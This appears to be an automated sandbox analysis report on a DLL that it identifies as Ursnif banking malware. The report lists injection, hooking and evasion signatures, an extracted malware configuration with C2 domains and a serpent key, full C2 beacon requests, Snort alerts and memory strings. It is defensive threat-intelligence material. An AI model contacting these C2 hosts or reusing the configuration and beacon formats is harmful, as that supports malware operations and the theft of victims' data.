Windows Analysis Report beneficial.dll

Overview

General Information

Sample Name: beneficial.dll
Analysis ID: 456598
MD5: 631779ef3aecb4838360304f162dbd8c
SHA1: 9103735e9771b40fb26b5b273683934dfea38402
SHA256: a4c7d46ab94add85adc74f9686c7367fd82eaae508b3e2227db8e62930fb3da0
Tags: dll
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Allocates memory in foreign processes
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://gtr.antoinfer.com/5QxR3u9Oxc2/66JuutLFo4_2BN/FYPvHdZdpqBBUlII8YbkV/HeRpg9bicXJHtfwV/D4QIfvz6kYooZLO/cw4gCcjcoRxS01qkn1/EW0Ez7bVC/W7k8iaBQuoYhbKZqLnrE/RbmpYueuIODfoh6oP2l/c8Ac2bwpliTaTSR56vdGwk/ZRQxemEpvF2A8/99lPQg9V/lwEJF2LaR_2FZsZYxJbXRUs/6u5PpA2s_2/FPyKVp1yfx9FnP4nW/L_2Fr3MO_2By/WnKnaVSLrhm/N0Y4cK91iRGQ0B/oWkJGcqoY10Xhf8Gg076m/Kf5Jj7Gzg1x_2BtG/X7PsvIId3dQ8Qbd/BbiLQ_2F/U Avira URL Cloud: Label: malware
Source: http://app.flashgameo.at/AaIOQUP2y/4dnIAMN75W41Bfts1fSz/M_2Fx5i8y8r51u0lG8k/Vow6wxsSIumTiRnzEaU_2F/CNqZZratbcUbt/LfJIE5RK/Qn2KT5OfSwybCTYBU60XzCf/sUfUuU3ny4/Nvm_2F3pWKviik2bT/GkHFCrtshckm/ulvNk97G1Hx/pXIQmYClmd4w2X/GUTmFeyxxN3C13bmMyAKU/NQgWhtBdSJ1Z_2Fo/_2B4Pdro50W_2FD/Bvoq_2B6Eukz15ckDu/b66LiH2F3/_2FbDHmG1_2BEazwEN73/RMWRczom09mYBn_2F5G/UMe8OA5em/vbxfmSXOeF5/N7V Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000003.289406918.0000000002D90000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "9LNhwxYlD34jdxVCbRuhkLxCR5ltHK+f92WD9cMttCYYbvrL4wv6YJiUl9MHov+IIcYUbYs1JFt6ciXd5FdaoSi3eR2WJz3cKGQV77NysByS4hxLa5EsHQS3R7uDA4zT8rf/1GgZx5Tp5bLYUv+OvwzR6K0bcxr8BVKOhWasMt87tt2F/oc67dLXbG6cOVSb9XDEKm1AD4WNvDG5s+8oRXKyXYNyBvqnTooYX8iM4Wq8R9SXbFoTevuBBwCGXRu7hbWXoRZP6gXfoUqzaH99rq2BGpO8MD8zNQdBO2RxQLO9iayjRA/+oZ0IQHzkfaTa+mDCPgDQii50gVawYZtAvTBYJQQyRdCtVbewt3iRduY=", "c2_domain": ["gtr.antoinfer.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "eTV3coItEryBMTIK", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "3"}
Multi AV Scanner detection for domain / URL
Source: gtr.antoinfer.com Virustotal: Detection: 7% Perma Link
Source: app.flashgameo.at Virustotal: Detection: 11% Perma Link
Multi AV Scanner detection for submitted file
Source: beneficial.dll Virustotal: Detection: 7% Perma Link

Compliance:

barindex
Uses 32bit PE files
Source: beneficial.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000017.00000002.393718546.000002846EF00000.00000002.00000001.sdmp, csc.exe, 0000001B.00000002.408584301.00000220E4530000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.427307077.0000022082640000.00000002.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.pdbXP source: powershell.exe, 00000015.00000002.534359939.0000024489666000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.pdbXP source: powershell.exe, 0000001A.00000002.543371423.000001DB0CC7E000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.446530652.0000000004E80000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.415578430.00000000058B0000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\kdz1kgtq\kdz1kgtq.pdb8 source: powershell.exe, 00000015.00000002.534359939.0000024489666000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.446530652.0000000004E80000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.415578430.00000000058B0000.00000004.00000001.sdmp
Source: Binary string: c:\Did\off\flow-Shoulder\Son\Record.pdb source: loaddll32.exe, 00000000.00000002.484513527.000000006E279000.00000002.00020000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\4mppu3lx\4mppu3lx.pdb8 source: powershell.exe, 0000001A.00000002.543279635.000001DB0CC3E000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04860F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_04860F53
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0484CA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_0484CA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04859386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_04859386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053E0F53 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_053E0F53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053D9386 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_053D9386
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_053CCA40 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_053CCA40
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_04846457 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_04846457

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49725 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49726 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49726 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49727 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49727 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49728 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49729 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49729 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49730 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49730 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49747 -> 185.228.233.17:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49747 -> 185.228.233.17:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ITOS-ASRU ITOS-ASRU
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /nXPlpJzbYjr74CTZyDzC/D9p7qOvHIUeaU5l5TWg/ZWUyp43sRXohtYVKqrN9BG/mDv4tDjcpen2y/vY_2BHuQ/74VicVpMxGX7XEuVSEs9P9C/rwR9QPDbqk/2qg_2FzIToR0YDTQN/nBMnf5keCaSk/WfxjKAafipS/yOngqQcB50LuwQ/Rbr2UaT2ic94OGNOmzJNW/ahzfbT2UaCp9En3m/nlCEAERonIRNNPZ/2Bo61_2Bo91_2BDafA/PFOPXJrOm/sjmvEQ2K2JDMfwJnFVMx/4z3kMl9gFa3Esr_2FSM/Pzl4b_2BiQbP02e2DJWYiz/yyvN7kRDoLRYu/Uzfpbij_/2FlM HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /5QxR3u9Oxc2/66JuutLFo4_2BN/FYPvHdZdpqBBUlII8YbkV/HeRpg9bicXJHtfwV/D4QIfvz6kYooZLO/cw4gCcjcoRxS01qkn1/EW0Ez7bVC/W7k8iaBQuoYhbKZqLnrE/RbmpYueuIODfoh6oP2l/c8Ac2bwpliTaTSR56vdGwk/ZRQxemEpvF2A8/99lPQg9V/lwEJF2LaR_2FZsZYxJbXRUs/6u5PpA2s_2/FPyKVp1yfx9FnP4nW/L_2Fr3MO_2By/WnKnaVSLrhm/N0Y4cK91iRGQ0B/oWkJGcqoY10Xhf8Gg076m/Kf5Jj7Gzg1x_2BtG/X7PsvIId3dQ8Qbd/BbiLQ_2F/U HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /P0jjO0xbOKcAJnGxIQOpo8/gKFtB_2Buq45i/OUi2Zqz_/2FXJhzSc5467S5cZtZCLfzw/WEn4WhbpR0/Ng4RE8DuDkec9tVF6/wLVORM0Uhp_2/BfCZjrl0dTQ/CA55efyHBHehFo/_2FegAa01sqcFDRw5Xb_2/BrtEaQdz7xZ_2F_2/BnevtS7ClgdhmDd/g09o5TUBS6V_2FoRMW/5ZLb_2FLO/hJUn0eVYDRnaPp3KQLYb/o5eYsU0tyaqUpedv0zC/VnSlyd0WZv1NgQoOuUsvzi/x9IipKWe7L3yQ/xurRoB1F/hG1qpWATHDMPuEfwEB6M_2F/cExPZ_2BRD/oJ0kYINluT2Ckx0_2/Fo7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /uvtPicnEF3ayZfNSduh1Odo/x80rwZaWjR/sjHY9dp1ZS2QpXbNd/fR3UvK_2FuFi/ra5JXB9aYjU/sjgtwpw9Z1TyDV/wTK0lzhdRABRAVrOUQDt6/1m0O51Kc1fEtP9UV/MFlFU_2FdH4xZg5/PVbHPy2QqeBLJ2kXpN/JWlsnfVtg/sJdHnpc8JO8gIKGisB8u/29Sp2slxdCuDaeXjYLe/0pm7DRZxlVHk6a9GRasNhz/GdheCQnIFhW6C/_2BW_2F_/2BtOkYFrX0LfxIkXFcw45MF/LMmU5JuPYf/aocoBw1uMCqxI3p6s/DEfR1YiYc/Cu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /oRH66S9974RVngrSWr_2FIv/PVFALrkG2I/Wnbzx3nHyPhGJ_2B0/lDZhPCm2vL8u/oMKeAaHPz5X/8Nl4L_2FNUoyc7/Jy8VIA7fHQqF7XiUI3Ff0/B3o6Eb6xtvEpbNMf/eqW1D785SCJyaXo/RVYKns_2FtN1yOn2Tk/HQ1DP9wHv/HsxMoHg0IyrvqonmdBdX/B_2B2sKeb9av7332HDx/1qSsk7BU_2BrcP7KNB8WRt/GGl7pCxp7fqEA/vqK79G1k/N8_2Fi0gh099LJYwx9ArNcx/2wmhsNP_2B/QSMxEp15aE25fwoCU/99RYkM0_2FJd/tiDhnbU42KQ/MjCgTagS/90K5WUpg/z HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /XD_2FGfGJryOnwqjG8zwl2B/USybsgcvex/jHVSMHDNCXrb6M6Tn/OhzcRPXSdY_2/BR1XyvU4uec/IJ3dNpaPhK5MqX/ZM_2BSwM62CY_2FjUJgfJ/ze_2BQkuaq8YSgC5/aHRIoH_2BZK1llG/5xUZmiZxkordzJYt_2/BWewe7iPW/UxaPfU_2Fqwz0lUddjXp/k5hsOkYd2p1zIu4wpac/kMY7yVFRd1MSAckCp3YJiQ/3YaUS09w_2Bcq/C2xNv8cP/Jv26aAzCYt19auTI84Be0Xd/PaJL8SJ9gI/QhmoG3Rgaw7E6t8Zd/SRYCF7CuqAl3HZR/Fv_2FZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /xLrZ8_2FAB_/2FR6_2Fu_2BaTb/5C0xlUV0a1z9g8JcSnrbc/zEmj_2FBKBeSMEdB/rpah9sEy05_2FMj/rgAemzqzwypRqSD3eM/ySehLjXGP/_2F2eaqjDNgoGOdY2xjO/lxujYqltab3Dgh1Vp4T/RNQ5Rf8S9BJak5pPf1FkxX/2auIjGjvaWnJH/suecnPKU/olT9tbEkXPnG8gDAitQyOg9/1DNb6hIlq6/OiafzFeAG90CnfWoP/W8OT_2FPGN41/y61_2BxGed4/Yzj6O0tW6lurQf/cIMHEq_2Fb3tO3ZabQx9l/ByrsZiIrbroNOxIz/RtnqStklGAPq7Xq/3Y7I2nWG867Sux/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: POST /AaIOQUP2y/4dnIAMN75W41Bfts1fSz/M_2Fx5i8y8r51u0lG8k/Vow6wxsSIumTiRnzEaU_2F/CNqZZratbcUbt/LfJIE5RK/Qn2KT5OfSwybCTYBU60XzCf/sUfUuU3ny4/Nvm_2F3pWKviik2bT/GkHFCrtshckm/ulvNk97G1Hx/pXIQmYClmd4w2X/GUTmFeyxxN3C13bmMyAKU/NQgWhtBdSJ1Z_2Fo/_2B4Pdro50W_2FD/Bvoq_2B6Eukz15ckDu/b66LiH2F3/_2FbDHmG1_2BEazwEN73/RMWRczom09mYBn_2F5G/UMe8OA5em/vbxfmSXOeF5/N7V HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
Source: global traffic HTTP traffic detected: GET /nXPlpJzbYjr74CTZyDzC/D9p7qOvHIUeaU5l5TWg/ZWUyp43sRXohtYVKqrN9BG/mDv4tDjcpen2y/vY_2BHuQ/74VicVpMxGX7XEuVSEs9P9C/rwR9QPDbqk/2qg_2FzIToR0YDTQN/nBMnf5keCaSk/WfxjKAafipS/yOngqQcB50LuwQ/Rbr2UaT2ic94OGNOmzJNW/ahzfbT2UaCp9En3m/nlCEAERonIRNNPZ/2Bo61_2Bo91_2BDafA/PFOPXJrOm/sjmvEQ2K2JDMfwJnFVMx/4z3kMl9gFa3Esr_2FSM/Pzl4b_2BiQbP02e2DJWYiz/yyvN7kRDoLRYu/Uzfpbij_/2FlM HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /5QxR3u9Oxc2/66JuutLFo4_2BN/FYPvHdZdpqBBUlII8YbkV/HeRpg9bicXJHtfwV/D4QIfvz6kYooZLO/cw4gCcjcoRxS01qkn1/EW0Ez7bVC/W7k8iaBQuoYhbKZqLnrE/RbmpYueuIODfoh6oP2l/c8Ac2bwpliTaTSR56vdGwk/ZRQxemEpvF2A8/99lPQg9V/lwEJF2LaR_2FZsZYxJbXRUs/6u5PpA2s_2/FPyKVp1yfx9FnP4nW/L_2Fr3MO_2By/WnKnaVSLrhm/N0Y4cK91iRGQ0B/oWkJGcqoY10Xhf8Gg076m/Kf5Jj7Gzg1x_2BtG/X7PsvIId3dQ8Qbd/BbiLQ_2F/U HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /P0jjO0xbOKcAJnGxIQOpo8/gKFtB_2Buq45i/OUi2Zqz_/2FXJhzSc5467S5cZtZCLfzw/WEn4WhbpR0/Ng4RE8DuDkec9tVF6/wLVORM0Uhp_2/BfCZjrl0dTQ/CA55efyHBHehFo/_2FegAa01sqcFDRw5Xb_2/BrtEaQdz7xZ_2F_2/BnevtS7ClgdhmDd/g09o5TUBS6V_2FoRMW/5ZLb_2FLO/hJUn0eVYDRnaPp3KQLYb/o5eYsU0tyaqUpedv0zC/VnSlyd0WZv1NgQoOuUsvzi/x9IipKWe7L3yQ/xurRoB1F/hG1qpWATHDMPuEfwEB6M_2F/cExPZ_2BRD/oJ0kYINluT2Ckx0_2/Fo7 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /uvtPicnEF3ayZfNSduh1Odo/x80rwZaWjR/sjHY9dp1ZS2QpXbNd/fR3UvK_2FuFi/ra5JXB9aYjU/sjgtwpw9Z1TyDV/wTK0lzhdRABRAVrOUQDt6/1m0O51Kc1fEtP9UV/MFlFU_2FdH4xZg5/PVbHPy2QqeBLJ2kXpN/JWlsnfVtg/sJdHnpc8JO8gIKGisB8u/29Sp2slxdCuDaeXjYLe/0pm7DRZxlVHk6a9GRasNhz/GdheCQnIFhW6C/_2BW_2F_/2BtOkYFrX0LfxIkXFcw45MF/LMmU5JuPYf/aocoBw1uMCqxI3p6s/DEfR1YiYc/Cu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /oRH66S9974RVngrSWr_2FIv/PVFALrkG2I/Wnbzx3nHyPhGJ_2B0/lDZhPCm2vL8u/oMKeAaHPz5X/8Nl4L_2FNUoyc7/Jy8VIA7fHQqF7XiUI3Ff0/B3o6Eb6xtvEpbNMf/eqW1D785SCJyaXo/RVYKns_2FtN1yOn2Tk/HQ1DP9wHv/HsxMoHg0IyrvqonmdBdX/B_2B2sKeb9av7332HDx/1qSsk7BU_2BrcP7KNB8WRt/GGl7pCxp7fqEA/vqK79G1k/N8_2Fi0gh099LJYwx9ArNcx/2wmhsNP_2B/QSMxEp15aE25fwoCU/99RYkM0_2FJd/tiDhnbU42KQ/MjCgTagS/90K5WUpg/z HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /XD_2FGfGJryOnwqjG8zwl2B/USybsgcvex/jHVSMHDNCXrb6M6Tn/OhzcRPXSdY_2/BR1XyvU4uec/IJ3dNpaPhK5MqX/ZM_2BSwM62CY_2FjUJgfJ/ze_2BQkuaq8YSgC5/aHRIoH_2BZK1llG/5xUZmiZxkordzJYt_2/BWewe7iPW/UxaPfU_2Fqwz0lUddjXp/k5hsOkYd2p1zIu4wpac/kMY7yVFRd1MSAckCp3YJiQ/3YaUS09w_2Bcq/C2xNv8cP/Jv26aAzCYt19auTI84Be0Xd/PaJL8SJ9gI/QhmoG3Rgaw7E6t8Zd/SRYCF7CuqAl3HZR/Fv_2FZ HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: gtr.antoinfer.com
Source: global traffic HTTP traffic detected: GET /xLrZ8_2FAB_/2FR6_2Fu_2BaTb/5C0xlUV0a1z9g8JcSnrbc/zEmj_2FBKBeSMEdB/rpah9sEy05_2FMj/rgAemzqzwypRqSD3eM/ySehLjXGP/_2F2eaqjDNgoGOdY2xjO/lxujYqltab3Dgh1Vp4T/RNQ5Rf8S9BJak5pPf1FkxX/2auIjGjvaWnJH/suecnPKU/olT9tbEkXPnG8gDAitQyOg9/1DNb6hIlq6/OiafzFeAG90CnfWoP/W8OT_2FPGN41/y61_2BxGed4/Yzj6O0tW6lurQf/cIMHEq_2Fb3tO3ZabQx9l/ByrsZiIrbroNOxIz/RtnqStklGAPq7Xq/3Y7I2nWG867Sux/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: app.flashgameo.at
Source: unknown DNS traffic detected: queries for: gtr.antoinfer.com
Source: unknown HTTP traffic detected: POST /AaIOQUP2y/4dnIAMN75W41Bfts1fSz/M_2Fx5i8y8r51u0lG8k/Vow6wxsSIumTiRnzEaU_2F/CNqZZratbcUbt/LfJIE5RK/Qn2KT5OfSwybCTYBU60XzCf/sUfUuU3ny4/Nvm_2F3pWKviik2bT/GkHFCrtshckm/ulvNk97G1Hx/pXIQmYClmd4w2X/GUTmFeyxxN3C13bmMyAKU/NQgWhtBdSJ1Z_2Fo/_2B4Pdro50W_2FD/Bvoq_2B6Eukz15ckDu/b66LiH2F3/_2FbDHmG1_2BEazwEN73/RMWRczom09mYBn_2F5G/UMe8OA5em/vbxfmSXOeF5/N7V HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: app.flashgameo.at
Source: loaddll32.exe, 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: loaddll32.exe, 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000025.00000000.507638380.00000000089F1000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.409791915.0000000005858000.00000004.00000040.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000015.00000002.534867804.00000244953EE000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000001A.00000002.523846280.000001DB08B7F000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000015.00000002.507680880.0000024485391000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.522653108.000001DB08971000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000001A.00000002.523846280.000001DB08B7F000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000001A.00000002.523846280.000001DB08B7F000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000015.00000002.534867804.00000244953EE000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.543578157.000001DB189CF000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000003.00000003.348342609.0000000005088000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.373389445.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.370586120.0000000003EB8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.435306000.0000000004E68000.00000004.00000040.sdmp, type: MEMORY
